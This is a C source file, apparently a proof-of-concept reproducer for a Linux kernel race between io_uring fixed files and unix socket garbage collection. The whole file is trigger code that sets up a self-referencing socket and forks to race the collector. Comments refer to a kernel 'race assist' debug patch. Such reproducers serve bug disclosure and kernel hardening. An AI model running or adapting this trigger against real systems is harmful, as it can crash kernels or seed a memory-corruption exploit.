#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/prctl.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

void send_fd(int sock, int fd) {
  int len = sizeof(struct cmsghdr) + sizeof(int);
  struct cmsghdr *hdr = alloca(len);
  *hdr = (struct cmsghdr) {
    .cmsg_len = len,
    .cmsg_level = SOL_SOCKET,
    .cmsg_type = SCM_RIGHTS
  };
  *(int*)CMSG_DATA(hdr) = fd;
  struct iovec iov = {
    .iov_base = "A",
    .iov_len = 1
  };
  struct msghdr msg = {
    .msg_control = hdr,
    .msg_controllen = len,
    .msg_iov = &iov,
    .msg_iovlen = 1
  };
  SYSCHK(sendmsg(sock, &msg, 0));
}

int recv_fd(int sock) {
  int len = sizeof(struct cmsghdr) + sizeof(int);
  struct cmsghdr *hdr = alloca(len);
  char dummy_char;
  struct iovec iov = {
    .iov_base = &dummy_char,
    .iov_len = 1
  };
  struct msghdr msg = {
    .msg_control = hdr,
    .msg_controllen = len,
    .msg_iov = &iov,
    .msg_iovlen = 1
  };
  SYSCHK(recvmsg(sock, &msg, 0));
  if (hdr->cmsg_len != len || hdr->cmsg_level != SOL_SOCKET || hdr->cmsg_type != SCM_RIGHTS)
    errx(1, "got bad message");
  return *(int*)CMSG_DATA(hdr);
}


static int uring_fd;

int main(void) {
  setbuf(stdout, NULL);
  sync();

  char *data_buffer = SYSCHK(mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0));

  // initialize uring
  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_DEFER_TASKRUN*/
  };
  uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_CQ_RING));
  struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                          MAP_SHARED, uring_fd,
                                          IORING_OFF_SQES));

  int launch_pair[2];
  SYSCHK(pipe(launch_pair));

  int pair[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, pair));
  send_fd(pair[1], uring_fd);
  close(pair[1]);

  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_FILES, &pair[0], 1));
  close(pair[0]);
  // at this point, the unix socket is only referenced from io-uring

  char dummy_char = 'X';
  char dummy_char2 = 'X';
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_READ,
    .flags = IOSQE_IO_HARDLINK,
    .fd = launch_pair[0],
    .off = 0,
    .addr = (unsigned long)&dummy_char,
    .len = 1,
    .rw_flags = 0
  };
  sqes[1] = (struct io_uring_sqe) {
    .opcode = IORING_OP_READ,
    .flags = IOSQE_FIXED_FILE,
    .fd = 0,
    .off = 0,
    .addr = (unsigned long)&dummy_char2,
    .len = 1
  };

  (*(int*)(sq_ring + params.sq_off.tail)) += 2;

  int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
                                 /*to_submit=*/2, /*min_complete=*/0,
                                 /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
  printf("submitted %d\n", submitted);

  SYSCHK(munmap(sq_ring, 0x1000));
  SYSCHK(munmap(cq_ring, 0x1000));
  SYSCHK(munmap(sqes, 0x1000));
  close(uring_fd);
  // at this point, uring is not externally referenced anymore, but the GC
  // hasn't run yet

  if (SYSCHK(fork()) == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));

    sleep(1);

    // inner race: trigger unix GC
    printf("BEGIN GC\n");
    SYSCHK(close(SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0))));
    printf("END GC\n");

    exit(0);
  }

  // outer race (DELAYED BY KERNEL RACE ASSIST PATCH):
  // trigger unix receive uring task work
  printf("BEGIN OUTER RACE dummy_char='%c' dummy_char2='%c'\n", dummy_char, dummy_char2);
  SYSCHK(prctl(PR_SET_NAME, "DELAYME"));
  SYSCHK(write(launch_pair[1], "L", 1));
  SYSCHK(prctl(PR_SET_NAME, "uring-recv"));
  printf("END OUTER RACE dummy_char='%c' dummy_char2='%c'\n", dummy_char, dummy_char2);
}
